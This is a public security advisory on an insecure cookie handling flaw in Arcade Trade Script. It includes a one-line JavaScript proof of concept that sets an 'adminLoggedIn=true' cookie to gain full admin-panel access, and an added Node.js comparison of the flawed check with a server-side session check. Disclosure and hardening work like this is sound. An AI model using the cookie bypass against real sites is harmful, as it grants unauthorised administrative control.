arcade-trade-script-exploit.txt - advisories - Security advisories that I have released to the public.
---
arcade-trade-script-exploit.txt (1359B)
---
Arcade Trade Script
Insecure Cookie Handling
===========================



SUMMARY
________

Arcade Trade Script is a full arcade site CMS (Content Management System)
with easy customization and advanced traffic trading system built in.
With ATS you will hardly ever have to FTP anything. Almost all files,
pages, and meta tags can be edited from the admin panel. ATS is extremely
easy to use and works for both regular arcades and full blown traffic
trading arcades.

Please note that this issue has now been fixed!



IMPACT
_______

Leads to full administration rights on the CMS admin panel.



VERSIONS
_________

Vulnerable systems: ATS versions prior to 1.0

Immune systems: None



DESCRIPTION #1
______________

Insecure cookie handling allows anyone to simply create a custom cookie
with the values below. This will allow full access to the admin panel.

Name - adminLoggedIn
Content - true
Path - /


Proof of Concept:
-> javascript:document.cookie="adminLoggedIn=true; path=/"

Fix:
-> None given.
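
Added example, not part of the original advisory and not ATS code: the
trust-the-cookie check described above next to a server-side session check,
written for Node.js. Only the adminLoggedIn cookie name comes from the
advisory; the sid cookie, the function names and the in-memory session store
are assumptions made for illustration.

```javascript
const crypto = require("crypto");

// Parse a Cookie request header into a name -> value map.
function parseCookies(header) {
  const jar = Object.create(null);
  for (const part of (header || "").split(";")) {
    const i = part.indexOf("=");
    if (i > 0) jar[part.slice(0, i).trim()] = part.slice(i + 1).trim();
  }
  return jar;
}

// Flawed pattern from the advisory: a value the client fully controls
// is the only thing standing between a visitor and the admin panel.
function isAdminVulnerable(cookieHeader) {
  return parseCookies(cookieHeader).adminLoggedIn === "true";
}

// Hardened pattern (assumed design): the cookie carries only an unguessable
// session ID; the admin flag lives in server-side state that is created
// after the password check succeeds and that expires.
const sessions = new Map(); // sid -> { admin, expires }

// Call only after credentials were verified; returns the Set-Cookie value.
function createAdminSession(ttlMs = 30 * 60 * 1000) {
  const sid = crypto.randomBytes(32).toString("hex");
  sessions.set(sid, { admin: true, expires: Date.now() + ttlMs });
  return `sid=${sid}; Path=/; HttpOnly; Secure; SameSite=Strict`;
}

function isAdminHardened(cookieHeader, now = Date.now()) {
  const session = sessions.get(parseCookies(cookieHeader).sid);
  if (!session) return false; // unknown or missing session ID
  if (session.expires <= now) return false; // stale session
  return session.admin === true;
}

// Constructed request header, as a browser sends it once the cookie is set.
const forged = "adminLoggedIn=true";
console.log(isAdminVulnerable(forged), isAdminHardened(forged)); // true false
```

The hardened check ignores adminLoggedIn entirely, so setting it by hand has
no effect; a guessed sid fails because no matching server-side record exists.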



ADDITIONAL INFO
_______________


Vendor URL - www.arcadetradescript.com
Underlying OS - Linux (Any), UNIX (Any), Windows (Any)
Credit - Jay Scott
Message History - Vendor notified and problem fixed
the following day.